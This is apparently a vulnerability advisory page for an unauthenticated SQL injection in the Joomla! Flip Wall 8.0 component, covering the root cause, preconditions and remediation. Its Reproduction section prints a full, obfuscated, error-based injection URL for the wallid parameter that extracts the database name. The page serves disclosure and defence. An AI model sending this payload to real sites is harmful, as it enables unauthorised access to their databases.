Joomla! Component Flip Wall 8.0 SQL Injection
Description
Joomla! Component Flip Wall 8.0 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the wallid parameter. Attackers can send GET requests to index.php with the option=com_flipwall&task=click&wallid parameter containing SQL injection payloads to extract sensitive database information.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
1Patches
Vulnerability mechanics
Root cause
"Missing input sanitization on the wallid parameter allows SQL injection."
Attack vector
An unauthenticated attacker sends a GET request to `index.php` with `option=com_flipwall&task=click&wallid=[SQL]` [ref_id=1]. The `wallid` parameter is not sanitized, enabling the attacker to inject SQL commands that are executed against the database. The exploit payload shown uses obfuscation techniques such as `/*!11166sELeCT*/` to bypass simple filters and extract database information via a double-query error-based injection.
Affected code
The vulnerability resides in the Flip Wall component's handling of the `wallid` parameter within the `com_flipwall` component. The `task=click` action passes user-supplied input directly into SQL queries without sanitization, allowing injection of arbitrary SQL commands.
What the fix does
The advisory does not include a published patch. To remediate, the application must validate and sanitize the `wallid` parameter, preferably by casting it to an integer or using prepared statements to prevent SQL injection. Without a fix, the component remains vulnerable to arbitrary SQL execution.
Preconditions
- configThe Joomla! Flip Wall component version 8.0 must be installed and accessible.
- authNo authentication is required; the attack is performed over HTTP GET.
- networkThe attacker must be able to reach the Joomla! instance over the network.
- inputThe attacker supplies a malicious SQL payload in the wallid parameter.
Reproduction
Send a GET request to `http://localhost/[PATH]/index.php?option=com_flipwall&task=click&wallid=811+aND(/*!11166sELeCT*/+0x30783331+/*!11166FrOM*/+(/*!11166SeLeCT*/+cOUNT(*),/*!11166CoNCaT*/((sELEcT(sELECT+/*!11166CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+AND+1=1 [ref_id=1]. The server will respond with database error messages or altered output indicating successful injection.
Generated on Jun 20, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
4- www.exploit-db.com/exploits/42524mitreexploit
- www.vulncheck.com/advisories/joomla-component-flip-wall-sql-injectionmitrethird-party-advisory
- pulseextensions.commitreproduct
- extensions.joomla.org/extensions/extension/ads-a-affiliates/sponsors/flip-wall/mitreproduct
News mentions
0No linked articles in our index yet.